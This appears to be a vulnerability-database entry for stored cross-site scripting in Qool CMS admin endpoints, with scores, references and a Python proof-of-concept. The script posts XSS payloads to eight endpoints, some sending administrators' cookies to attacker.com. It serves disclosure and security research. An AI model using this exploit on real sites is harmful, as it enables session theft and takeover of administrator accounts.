Security Vulnerability Report
CVE-2013-20006 CVSS 7.5 HIGH

Published: 2026-03-16 14:17:46
Last Modified: 2026-04-15 14:56:46

Description

Qool CMS contains multiple persistent cross-site scripting vulnerabilities in several administrative scripts where POST parameters are not properly sanitized before being stored and returned to users. Attackers can inject malicious JavaScript code through parameters like 'title', 'name', 'email', 'username', 'link', and 'task' in endpoints such as addnewtype, addnewdatafield, addmenu, addusergroup, addnewuserfield, adduser, addgeneraldata, and addcontentitem to execute arbitrary scripts in administrator browsers.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector (3.1, Primary): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploitability Score: 3.9, Impact Score: 3.6
CVSS 4.0 (Secondary): 8.7 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-79

Configurations (Affected Products)

No configuration data available.

Qool CMS, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2013-20006 PoC - Qool CMS Stored XSS
# Target: Qool CMS admin endpoints
# Vulnerability: Stored XSS in POST parameters
import requests

TARGET_URL = "http://target.com/qool-cms/admin/"

# XSS payloads for different parameters
PAYLOADS = {
    'title': '<script>alert(document.cookie)</script>',
    'name': '<img src=x onerror=this.src="https://attacker.com/?c="+document.cookie>',
    'email': '" onfocus="alert(1)" autofocus="',
    'username': '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>',
    'link': 'javascript:alert(document.domain)',
    'task': '<iframe src="javascript:alert(document.cookie)">'
}

ENDPOINTS = [
    'addnewtype', 'addnewdatafield', 'addmenu', 'addusergroup',
    'addnewuserfield', 'adduser', 'addgeneraldata', 'addcontentitem'
]


def exploit(endpoint, param, payload):
    """Send malicious POST request to inject XSS"""
    target = TARGET_URL + endpoint
    data = {
        param: payload,
        'submit': 'Submit'
    }
    try:
        requests.post(target, data=data, timeout=10)
        print(f"[+] Sent payload to {endpoint} with param {param}")
        print(f"[+] Payload: {payload}")
        return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2013-20006 Qool CMS Stored XSS Exploit")
    print("=" * 50)
    # Test all endpoints
    for endpoint in ENDPOINTS:
        for param, payload in PAYLOADS.items():
            exploit(endpoint, param, payload)
    print("\n[!] PoC completed. Check if XSS was stored and executed.")

References

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5133.php
https://www.exploit-db.com/exploits/24627
https://www.vulncheck.com/advisories/qool-cms-multiple-persistent-cross-site-scripting-vulnerabilities

Record status: Deferred. Published 2026-03-16T14:17:46.170, last modified 2026-04-15T14:56:45.970.